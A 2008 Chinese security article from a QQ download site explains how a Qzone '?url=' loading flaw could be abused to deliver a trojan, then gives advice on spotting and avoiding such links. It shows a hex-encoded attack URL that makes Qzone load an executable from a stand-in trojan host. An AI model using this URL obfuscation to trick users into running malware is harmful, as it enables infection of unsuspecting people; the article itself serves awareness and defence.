五月天综合网站日本|亚洲欧美人与动人物在线|久久1024国产对白精品|原创国产中文AV

    

        • 

        <bdo id="jr9fn"></bdo>
        <span id="jr9fn"></span>
        


        
  
        
     
        專業(yè)的QQ下載站 本站非騰訊QQ官方網(wǎng)站
        
     
        QQ下載|QQ資訊|QQ分類|下載排行|最近更新
        
  
        

        

        
  
        
      
        
        
    
        

        



        當(dāng)前位置:首頁騰訊技術(shù)QQ攻防技術(shù) → 騰訊Qzone地址變木馬 成黑客利器
        

        
  
        
    
        
      
        騰訊Qzone地址變木馬 成黑客利器
        
      
        時間:2008/1/25 10:48:00人氣:0作者:佚名我要評論(0)
              

      
        由于QQ在桌面IM領(lǐng)域占據(jù)著絕對霸主地位,在其身上衍生的各種產(chǎn)品也變得日益流行,而Qzone也逐漸成為網(wǎng)友書寫日志和展示個性的地方。因此,Qzone的安全性也備受關(guān)注。不過,Qzone近日卻爆出了一個跨站漏洞,這個漏洞非常容易被黑客利用。那么,黑客一般會如何通過這個漏洞來攻擊普通用戶呢?作為用戶,我們又如何來防范這一漏洞的危害呢? 

          一、模擬黑客攻擊
        

          這里,我們首先來了解這個漏洞的具體情況。Qzone的跨站漏洞是網(wǎng)友無意中打開類似“http://user.qzone.qq.com/QQ號碼?url=任意字母”時發(fā)現(xiàn)的,這時網(wǎng)頁顯示為一個框架網(wǎng)頁,中間為"無法打開網(wǎng)頁"的空白頁面(如圖1);然而,當(dāng)輸入類似“http://user.qzone.qq.com/QQ號碼?url=http://www.baidu.com”的地址時卻可以正常顯示,這時url后的網(wǎng)址其實(shí)在幕后是加載的。那么,Qzone的跨站漏洞又是如何被黑客作為木馬的媒介的呢?
        

        


        
騰訊Qzone地址變木馬載體成黑客利器
        

        
Qzone默認(rèn)加載的地址要小心
        

          第一步:黑客需要對該地址進(jìn)行喬裝改扮一番。比如:網(wǎng)頁木馬的url為"http://www.muma.com/muma.exe"。黑客會使用URl加密技術(shù)來為木馬地址作掩護(hù),常用的方法是把url地址轉(zhuǎn)換為16進(jìn)制,這里以ASCII碼隨心換為例(如圖2)進(jìn)行示范。
        

        


        
騰訊Qzone地址變木馬載體成黑客利器
        

        
黑客常用URL偽裝器
        

          第二步:黑客將Qzone的地址設(shè)置為"http://user.qzone.qq.com/QQ號碼?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63%6F%6D%2F%6D%75%6D%61%2E%65%78%65"并在網(wǎng)頁上貼出Qzone的地址來引誘網(wǎng)友點(diǎn)擊,用戶往往點(diǎn)擊了該地址下載運(yùn)行了木馬還蒙在鼓里。
        

          二、如何防范Qzone攻擊
        

          方法1:既然這一跨站漏洞這么隱蔽,用戶感染的幾率也不會低。我們需要如何來防范這一漏洞可能造成的危害呢?做到不感染病毒,未雨綢繆是最有效果的。因此,我們在訪問網(wǎng)友的Qzone前,要多長幾個心眼,要觀察其網(wǎng)址的形式。
        

          一般正常的Qzone的地址是"http://user.qzone.qq.com/號碼"或者"http://號碼.qzone.qq.com/"形式的,如果出現(xiàn)"http://user.qzone.qq.com/QQ號碼?url="的地址就要謹(jǐn)慎了,Qzone也可能出現(xiàn)類似"http://user.qzone.qq.com/號碼/?url=http%3A//photo.qq.com/tips_jump.htm%23uin%3D號碼%26albumid%3D393029702%26photoid%3D"的地址,如果地址里面完全沒有QQ的地址段,那么為了防止下載運(yùn)行網(wǎng)頁木馬,可以將url后的字符輸入到ASCII碼隨心換進(jìn)行轉(zhuǎn)換(如果是像以上地址的格式,可以將%后的十六進(jìn)制字符逐個進(jìn)行轉(zhuǎn)換來獲得完整地址),如果url指向可執(zhí)行文件就不能點(diǎn)擊了。
        

          方法2:為了防止系統(tǒng)被種植網(wǎng)頁木馬,還可以安裝殺毒軟件和防火墻并需要開始實(shí)時文件和網(wǎng)絡(luò)監(jiān)控,這樣即使下載了網(wǎng)頁木馬也會被清除。如果發(fā)現(xiàn)了可疑的Qzone地址要及時舉報,讓黑客成為過街老鼠,毫無藏身之處。
        

          小結(jié):Qzone的跨站漏洞被用來種植木馬具有受眾廣的特點(diǎn),Qzone的地址經(jīng)過加密化裝后,又有幾個人會仔細(xì)地進(jìn)行甄別呢?因此,利用人們偷窺人家隱私空間的好奇心來傳播木馬是很有效果的。
        

          其實(shí),要防范Qzone地址在你的電腦種植木馬也不難,最簡單的方法就是只點(diǎn)擊QQ資料里的Qzone地址,不去其他網(wǎng)站點(diǎn)擊就可以了。另外,需要使用具有防范IE漏洞的安全工具和殺毒軟件來查殺這類木馬的下載安裝,如:瑞星卡卡。攜帶木馬的Qzone地址一經(jīng)發(fā)現(xiàn)要馬上通知網(wǎng)友,決不姑息,不讓其他人成為黑客的犧牲品。同時,每次Qzone提示升級我們也最好升級不用嫌麻煩而取消升級,以免被黑客利用其他未知的漏洞。
        
      
    
        
    
    
        
        
        猜你喜歡
        
        
        
          
    
        
    
        
        
        網(wǎng)友評論
        
         
        
   
        
    
        
      
      
        
        
        
        請自覺遵守互聯(lián)網(wǎng)相關(guān)政策法規(guī),評論內(nèi)容只代表網(wǎng)友觀點(diǎn),與本站立場無關(guān)!
      
        
    
        
  
        
  
        
    
        熱門評論
        
    
        
      
    
        
  
        
  
        
    
        最新評論
        
      
        
        
      
        
  
        
  
        已有0人參與,點(diǎn)擊查看更多精彩評論
        

        
    
        
  
        
  
        
      
    
          
          
   
  
        

        


        
	
        

         關(guān)于騰牛 | 聯(lián)系方式 | 發(fā)展歷程 | 版權(quán)聲明 | 下載幫助(?) | 廣告聯(lián)系 | 網(wǎng)站地圖 | 友情鏈接 
        

         Copyright 2005-2018 QQTN.com 【騰牛網(wǎng)】 版權(quán)所有 鄂ICP備17010784號-1 | 鄂公網(wǎng)安備 42011102000245號
        

        聲明: 本站非騰訊QQ官方網(wǎng)站 所有軟件和文章來自互聯(lián)網(wǎng) 如有異議 請與本站聯(lián)系 本站為非贏利性網(wǎng)站 不接受任何贊助和廣告